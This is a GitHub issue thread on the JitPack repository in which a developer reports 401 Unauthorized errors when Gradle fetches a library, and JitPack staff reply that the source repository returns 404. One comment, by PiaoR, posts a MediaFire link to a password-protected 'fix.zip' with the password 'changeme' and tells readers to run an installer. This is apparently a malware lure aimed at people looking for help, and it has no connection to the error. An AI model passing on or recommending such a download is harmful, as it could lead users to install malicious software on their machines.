### ISSUE TITLE
I am experiencing another 401 error from a public repository.

### ISSUE THREAD

**Issue by fsanz92** [jitpack/jitpack.io#6484]
Good morning,

I am writing to inform you that I am still experiencing a 401 error from a public repository. 

```
> Could not resolve com.github.florent37:inline-activity-result-kotlin:1.0.4.
      > Could not get resource 'https://jitpack.io/com/github/florent37/inline-activity-result-kotlin/1.0.4/inline-activity-result-kotlin-1.0.4.pom'.
            > Could not GET 'https:/jitpack.io/com/github/florent37/inline-activity-result-kotlin/1.0.4/inline-activity-result-kotlin-1.0.4.pom'. Received status code 401 from server: Unauthorized
```

This issue is not isolated to this particular repository, as it has also occurred in other repositories.

I have been monitoring the bug for 15 days and believe that a quick fix should be provided to all developers, apart from the addition of libraries locally to our project.

I would be grateful for any suggestions on how to escalate this problem and obtain a solution or a way to fix it quickly.

Thank you in advance for your assistance.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Thelouras58** [comment]
+1

**Comment by upendracraftsilicon** [comment]
+1

**Comment by jitpack-io** [comment]
Hi

That repository does not appear to be public.
https://github.com/florent37/inline-activity-result-kotlin returns 404.

**Comment by fsanz92** [comment]
> Hi
> 
> That repository does not appear to be public. https://github.com/florent37/inline-activity-result-kotlin returns 404.

@jitpack-io , thank you for your response.

The parent repository is available at https://github.com/florent37/InlineActivityResult. For the library to work properly, it is essential that this repository is included.

I would like to draw your attention to the numerous developers who have encountered the same problem with different public repositories.

You can find the problem here: https://github.com/jitpack/jitpack.io/issues/4039#issuecomment-2299794603
